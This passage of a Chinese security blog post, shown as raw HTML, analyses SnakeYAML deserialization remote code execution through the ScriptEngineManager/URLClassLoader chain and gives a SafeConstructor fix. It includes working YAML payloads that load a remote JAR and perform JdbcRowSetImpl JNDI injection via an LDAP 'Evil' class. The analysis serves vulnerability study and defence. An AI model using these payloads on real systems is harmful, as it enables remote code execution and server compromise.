src="https://wechat2rss.xlab.app/img-proxy/?k=6350fe40&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrE8oiaO71rHia0Y3DOgTgzlgKqdWic1W8iceO90ADUqO9Picuhj01pSrHnBoA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.15616681455190773" data-s="300,640" style="" data-type="png" data-w="1127" src="https://wechat2rss.xlab.app/img-proxy/?k=4397709d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEhKKH4JWr7ibemAnM2pk0AibDIWovf0syNlDnyYS5ic4DycMdSKZCiaINTw%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;OI59-1663604521425&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;SoGF-1663604521423&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;跟进&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#333333&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;rgb(255, 255, 255)&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18},{&#34;type&#34;:&#34;fontFamily&#34;,&#34;value&#34;:&#34;Arial&#34;}]},{&#34;text&#34;:&#34; constructObjectNoCheck &#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;},{&#34;type&#34;:&#34;fontFamily&#34;,&#34;value&#34;:&#34;Arial&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18}]},{&#34;text&#34;:&#34;方法. &#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#333333&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;rgb(255, 255, 255)&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18},{&#34;type&#34;:&#34;fontFamily&#34;,&#34;value&#34;:&#34;Arial&#34;}]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">跟进</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> constructObjectNoCheck </span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">方法.</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.2815366972477064" data-s="300,640" style="" data-type="png" data-w="1744" src="https://wechat2rss.xlab.app/img-proxy/?k=a7e9b6c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEaGnsW0HKuOsWjEOupxOchQicDhazYDofQQKg950K6dYZxAsG2iaib3ictQ%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></p></article><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;57ae-1663604420177&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;QrZA-1663604420176&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;接着跟进&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#333333&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;rgb(255, 255, 255)&#34;},{&#34;type&#34;:&#34;fontFamily&#34;,&#34;value&#34;:&#34;Arial&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18}]},{&#34;text&#34;:&#34;construct.construct&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;},{&#34;type&#34;:&#34;fontFamily&#34;,&#34;value&#34;:&#34;Arial&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18}]},{&#34;text&#34;:&#34;方法&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#333333&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;rgb(255, 255, 255)&#34;},{&#34;type&#34;:&#34;fontFamily&#34;,&#34;value&#34;:&#34;Arial&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18}]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">接着跟进</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;">construct.construct</span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">方法</span></span></p></article><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.44612644701691895" data-s="300,640" style="" data-type="png" data-w="1123" src="https://wechat2rss.xlab.app/img-proxy/?k=da79184c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEDqdVGYu5xpVjXtiaUx0xULaeen78dO896jNIMjOIs42JBKXNvVf1l0w%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;"><span style="font-size: 15px;letter-spacing: 0.034em;">这里会调用</span><span style="font-size: 15px;letter-spacing: 0.034em;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> this.getConstructor</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.2231784279977051" data-s="300,640" style="" data-type="png" data-w="1743" src="https://wechat2rss.xlab.app/img-proxy/?k=217cbe14&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEPlZLbBFcrS26jmymtzPC6tU3r2dUopMXibHjDZrKTBNppXMGWwsgicJw%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.2588339222614841" data-s="300,640" style="" data-type="png" data-w="1132" src="https://wechat2rss.xlab.app/img-proxy/?k=fd9f3e59&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrExnRCVfd8r775nd3Wic1u8zcciaPTibV178obZVzncc6IJpr3DwNv7WePA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 14px;"><span style="font-size: 14px;letter-spacing: 0.034em;">这里</span><span style="font-size: 14px;letter-spacing: 0.034em;background-color: rgb(253, 238, 238);color: rgb(255, 0, 1);">getConstructor</span><span style="font-size: 14px;letter-spacing: 0.034em;">方法所做的事情就是获取类的构造方法</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.12441037735849056" data-s="300,640" style="" data-type="png" data-w="1696" src="https://wechat2rss.xlab.app/img-proxy/?k=dcfb4654&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEPsu6xn0334hvlY5uhAibBrIhOCB9XhQ1OLibvhpK0NOJOV6oju25F1CQ%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></p><article><p style="text-align: left;"><span style="font-size: 15px;">跟进去发现继续调用<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);"> getClassForNode </span>，在该方法中获取了<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">name</span>的值为<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">javax.script.ScriptEngineManager</span>，然后调用<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">getClassForName</span>对<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">name</span>进行传入获取<span style="background-color: rgb(243, 244, 244);">cl</span>的<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">class</span>对象</span></p><p style="text-align: left;"><img class="rich_pages wxw-img" data-ratio="0.6082987551867219" style="width: 1205px;height: 733px;" data-type="png" data-w="1205" src="https://wechat2rss.xlab.app/img-proxy/?k=e7f8b7d2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrED5PKic7T8oXQh5E0BHD75SVGzIYiaar7oUbkuXbjnjaBVbf5pXP8Mm6w%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><img class="rich_pages wxw-img" data-ratio="0.3958513396715644" style="width: 1157px;height: 458px;" data-type="png" data-w="1157" src="https://wechat2rss.xlab.app/img-proxy/?k=139a4f88&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEHicKt3LbTO5ficwvDfPmrH7flr1ZjiaoEhyJuxktrreNRvQaFcunP8Q5w%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="font-size: 15px;">跟进<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> getClassForName </span>， 在这里使用反射创建了一个<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">javax.script.ScriptEngineManager</span>对象的具体实现.</span></p><p style="text-align: left;"><img class="rich_pages wxw-img" data-ratio="0.20533070088845015" style="width: 1013px;height: 208px;" data-type="png" data-w="1013" src="https://wechat2rss.xlab.app/img-proxy/?k=0c6a9278&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrExSsDeLPqMbjHVibz8cK1UyLrk50ibUvpzicQPA9GmWXEuS4xqGIwjzXVQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="font-size: 15px;"><span style="color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">接着回到上面的</span><span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> construct </span><span style="color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">处继续分析</span></span></p><p style="text-align: left;"><img class="rich_pages wxw-img" data-ratio="0.2932692307692308" style="width: 1040px;height: 305px;" data-type="png" data-w="1040" src="https://wechat2rss.xlab.app/img-proxy/?k=26b383a5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEEaW6X7bNHic8W8a5yU01PfTm5FgI77CQsibTRWDAsOayHURCpYrdcYdA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="font-size: 15px;">这里调用完<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);"> getContructor </span>方法后将调用该返回对象的<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> construct </span>方法，继续跟进</span></p><p style="text-align: left;"><img class="rich_pages wxw-img" data-ratio="0.5117399157134257" style="width: 1661px;height: 850px;" data-type="png" data-w="1661" src="https://wechat2rss.xlab.app/img-proxy/?k=99ba2376&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrE2KHr1POHG3A3G0ccG5LcEPicYhJOdFG9vAHwBJZ810AXszImhFCMDUA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="font-size: 15px;">该<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> constructor </span>方法逻辑如上图所示，注意这里<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> Constructor.this.newInstance </span>方法调用</span></p><p style="text-align: left;"><img class="rich_pages wxw-img" data-ratio="0.44657863145258103" style="width: 1666px;height: 744px;" data-type="png" data-w="1666" src="https://wechat2rss.xlab.app/img-proxy/?k=1d9f1d7f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEb3X1JXnBRcUAHqdsNOUv7ico98rjnYaiabFg3KzSAVjgAP9wZibOVHE1A%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="font-weight: bold;font-size: 17px;"><br/></span></p><p style="text-align: left;"><span style="font-weight: bold;font-size: 16px;">远程恶意对象创建</span></p><p style="text-align: left;"><span style="font-size: 15px;">在<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> newInstance </span>方法中会获取<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);"> node </span>的类型(这里就是我们自定义类型)，然后通过反射获取该类的构造方法，然后设置访问权限并提供构造方法创建实例对象，底层使用的是Java反射机制，这里直接看反射调用的方法<span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">public javax.script.ScriptEngineManager(java.lang.ClassLoader)</span></span></p><p style="text-align: left;"><img class="rich_pages wxw-img" data-ratio="0.2261029411764706" style="width: 1632px;height: 369px;" data-type="png" data-w="1632" src="https://wechat2rss.xlab.app/img-proxy/?k=d59340e7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrE4tYQicqjIPp1UibZWO7xlAxPMtJuot36VTibjcvZJib8kFhEicmMSRWBYDA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><img class="rich_pages wxw-img" data-ratio="0.7179269328802039" style="width: 1177px;height: 845px;" data-type="png" data-w="1177" src="https://wechat2rss.xlab.app/img-proxy/?k=93acdbda&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEowK5ERMZoq1X2qQ2icFRL9ZAYC5nEniaLDjeoBcBwpt7DS8tR9EHlMJg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="font-size: 15px;">这里调用了<span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">return getServiceLoader(loader);</span>，接着就是<span style="background-color: rgb(253, 238, 238);color: rgb(255, 0, 1);">ServiceLoader.load()</span>，对我们自定义的服务(SPI)加载器进行初始化，可以看到这部分就是SPI机制的实现</span></p><p style="text-align: left;"><img class="rich_pages wxw-img" data-ratio="0.13735899137358992" style="width: 1507px;height: 207px;" data-type="png" data-w="1507" src="https://wechat2rss.xlab.app/img-proxy/?k=f083e713&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEm3RBHibp0m0iciaUguDf9eqE5WovXYHI1Qm0gWjlHHMvBHic6Lzua9xzvg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="font-size: 15px;">这时候我们再看Github下载的Payload项目，可以发现这个项目实际上就是一个实现了<span style="background-color: rgb(253, 238, 238);color: rgb(255, 0, 1);">ScriptEngineFactory</span>接口的服务提供者，前面分析过，在<span style="background-color: rgb(253, 238, 238);color: rgb(255, 0, 1);">next</span>方法的时候会解析服务列表文件并创建服务提供者对象实例</span></p><p><img class="rich_pages wxw-img" data-ratio="0.34418282548476453" style="width: 1444px;height: 497px;" data-type="png" data-w="1444" src="https://wechat2rss.xlab.app/img-proxy/?k=9909fb96&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrE8c4iaTYe8gsoNdEVGM4H8Kk4jeXoG3oic4BvXfsuH3dODKjrvOIVXicDQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;">回到<span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">javax.script.ScriptEngineManager#initEngines</span>方法继续分析，在前面<span style="background-color: rgb(253, 238, 238);color: rgb(255, 0, 1);">SPI</span>机制中我们分析知道了在<span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">next</span>的时候会进行反射加载服务提供者，我们只需要在此处下断即可</span></p><p><img class="rich_pages wxw-img" data-ratio="0.37305699481865284" style="width: 1737px;height: 648px;" data-type="png" data-w="1737" src="https://wechat2rss.xlab.app/img-proxy/?k=f9e41296&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEU3icjmLxtl2YibWricZwfb6Zb8Z1hN36HMKCHGOyXj2CDiaGvXVZVkUUEA%2F640%3Fwx_fmt%3Dpng"/></p><p><img class="rich_pages wxw-img" data-ratio="0.15597147950089127" style="width: 1122px;height: 175px;" data-type="png" data-w="1122" src="https://wechat2rss.xlab.app/img-proxy/?k=18e9e0d9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEcs3eibElON3AzGMVSUFBhBNb3vnv5B9Yc0PkBkXpcIFMhn6fAdIsriag%2F640%3Fwx_fmt%3Dpng"/></p><p><img class="rich_pages wxw-img" data-ratio="0.3976945244956772" style="width: 694px;height: 276px;" data-type="png" data-w="694" src="https://wechat2rss.xlab.app/img-proxy/?k=8fcd218b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEZ40zZlfibg7jYXjEP6ukeUsRD3porv0VawdvibKNm8IXtD7iasHAiaiaQog%2F640%3Fwx_fmt%3Dpng"/></p><p><img class="rich_pages wxw-img" data-ratio="0.5667107001321003" style="width: 1514px;height: 858px;" data-type="png" data-w="1514" src="https://wechat2rss.xlab.app/img-proxy/?k=295d5d78&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEf2fS2htHWjhbqg7tEgSVvuzTJyjJPd1gNQV1unsLMT0bZb8RsjfUIg%2F640%3Fwx_fmt%3Dpng"/></p><p><img class="rich_pages wxw-img" data-ratio="0.3197399527186761" style="width: 1692px;height: 541px;" data-type="png" data-w="1692" src="https://wechat2rss.xlab.app/img-proxy/?k=d100cc52&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEMs0qIiabYlQdmKunPa7PfL1Lcze2XhlfAGicbvWv8vRia4I8lUMIiacoqA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;">最后有一个细节点那就是真正发起请求这个<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">Payload Jar</span>的操作实际上是在<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">java.util.ServiceLoader.LazyIterator#hasNextService</span>方法中的<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">parse(service, configs.nextElement());</span>调用中进行的，此时的loader是一个<span style="font-size: 15px;background-color: rgb(253, 238, 238);color: rgb(255, 0, 1);">UrlClassLoader</span>，前面分析<span style="font-size: 15px;background-color: rgb(253, 238, 238);color: rgb(255, 0, 1);">SPI</span>机制流程的时候有说明在<span style="font-size: 15px;background-color: rgb(253, 238, 238);color: rgb(255, 0, 1);">parse</span>方法中才会进行服务列表文件的读取解析，也就是发生请求的地方</span></p><p><img class="rich_pages wxw-img" data-ratio="0.5051428571428571" style="width: 1750px;height: 884px;" data-type="png" data-w="1750" src="https://wechat2rss.xlab.app/img-proxy/?k=aad9bcb1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEV8jypano60RmiarEFia7qHpoib2aicwicom6WsBtRqaHm8FiaI4Mh0DcrXNg%2F640%3Fwx_fmt%3Dpng"/></p><p><img class="rich_pages wxw-img" data-ratio="0.3578874218207088" style="width: 1439px;height: 515px;" data-type="png" data-w="1439" src="https://wechat2rss.xlab.app/img-proxy/?k=81b7363a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEboK8iaz4zeasmaUuhR087Z4qzO6u249ehLNibxypafn3C3icHQlM2mILA%2F640%3Fwx_fmt%3Dpng"/></p></article><p><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p><article><p><span style="font-weight: bold;font-size: 20px;">总结</span></p><p><span style="font-size: 15px;">整个调试下来感觉有点类似于在调<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> Fastjson </span>，前面一小半的部分是在做一些<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">payload</span>的处理，涉及到一些变量，比如<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">tag</span>、<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">node</span>、<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">type</span>这些，以及<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">SnakeYaml</span>内部对于<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> !! </span>去转换为<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">tag</span>这类的操作，然后就是一些数据的流向，需要仔细观察；后半部分就是整个漏洞的一个触发，整体的一个思路就是先反射构造对象。</span></p><p><span style="font-size: 15px;">在构造时候会触发该类的<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> 构造方法 </span>、<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);"> set系列方法 </span>，所以，通常我们将<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> 命令执行代码 </span>写在构造函数内。</span></p><p><span style="font-size: 15px;">如果是利用<span style="font-weight: bold;">ScriptEngineManager手法加载远程JAR</span>的话流程就是分别获取<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">ScriptEngineManager</span>、<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">URLClassLoader</span>、<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">URL</span>的<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">class</span>对象，之后在<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">construct</span>方法内最终分别实例化了<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">URL</span>、<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">URLClassLoader</span>、<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">ScriptEngineManager</span>来造成远程代码执行。</span></p><p><span style="font-weight: bold;font-size: 20px;">漏洞修复</span></p><p><span style="font-size: 15px;">这个漏洞涉及全版本，只要反序列化内容可控,那么就可以去进行反序列化攻击</span></p><p><span style="font-size: 15px;">修复方案：加<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">入new SafeConstructor()</span>类进行过滤</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="java"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">package</span> Snake;</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">import</span> org.yaml.snakeyaml.Yaml;</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">import</span> org.yaml.snakeyaml.constructor.SafeConstructor;</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__class"><span class="code-snippet__keyword">class</span> <span class="code-snippet__title">snaketest</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">main</span><span class="code-snippet__params">(String[] args)</span> </span>{</span></code><code><span class="code-snippet_outer">        String context = <span class="code-snippet__string">&#34;!!javax.script.ScriptEngineManager [\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;  !!java.net.URLClassLoader [[\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;    !!java.net.URL [\&#34;<a href="http://127.0.0.1:9000/yaml-payload.jar\" target="_blank">http://127.0.0.1:9000/yaml-payload.jar\</a>&#34;]\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;  ]]\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;]&#34;</span>;</span></code><code><span class="code-snippet_outer">        Yaml yaml = <span class="code-snippet__keyword">new</span> Yaml(<span class="code-snippet__keyword">new</span> SafeConstructor());</span></code><code><span class="code-snippet_outer">        yaml.load(context);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p><br/></p></article></article><p><br/></p><p><br/></p><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;AfdX-1677903924540&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h1&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;wRjE-1677903924538&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;JdbcRowSetImpl&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:26}]}]}]}]"><p><span style="font-weight: bold;font-size: 20px;">JdbcRowSetImpl</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="css"><code><span class="code-snippet_outer">!!<span class="code-snippet__selector-tag">com</span><span class="code-snippet__selector-class">.sun</span><span class="code-snippet__selector-class">.rowset</span><span class="code-snippet__selector-class">.JdbcRowSetImpl</span> {<span class="code-snippet__attribute">dataSourceName</span>: <span class="code-snippet__string">&#39;ldap://127.0.0.1:9999/Evil&#39;</span>, autoCommit: true}</span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;784b-1677903871335&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;MtXp-1677903871334&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;JNDI注入&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;mJjJ-1677904259656&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;l2d5-1677904259657&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;首先本地生成恶意字节码并监听生成远程恶意类地址&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;AJ8J-1677904330157&#34;,&#34;name&#34;:&#34;image&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;url&#34;:&#34;https://note.youdao.com/yws/res/142078/WEBRESOURCE5d20ab0eaf6ab424e5cdca17dc904840&#34;,&#34;width&#34;:568,&#34;height&#34;:93},&#34;nodes&#34;:[],&#34;state&#34;:{&#34;renderSource&#34;:&#34;https://note.youdao.com/yws/res/142078/WEBRESOURCE5d20ab0eaf6ab424e5cdca17dc904840&#34;,&#34;initialSize&#34;:{&#34;width&#34;:568,&#34;height&#34;:93},&#34;loading&#34;:false}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;sl12-1677904247857&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;LOp1-1677904247858&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;使用marshalsec创建ldap服务引用远程恶意类&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 17px;">JNDI注入</span></p><p><span style="font-size: 15px;">首先本地生成恶意字节码并监听生成远程恶意类地址</span></p><p><img class="rich_pages wxw-img" data-ratio="0.1637323943661972" style="width: 568px;height: 93px;" data-type="png" data-w="568" 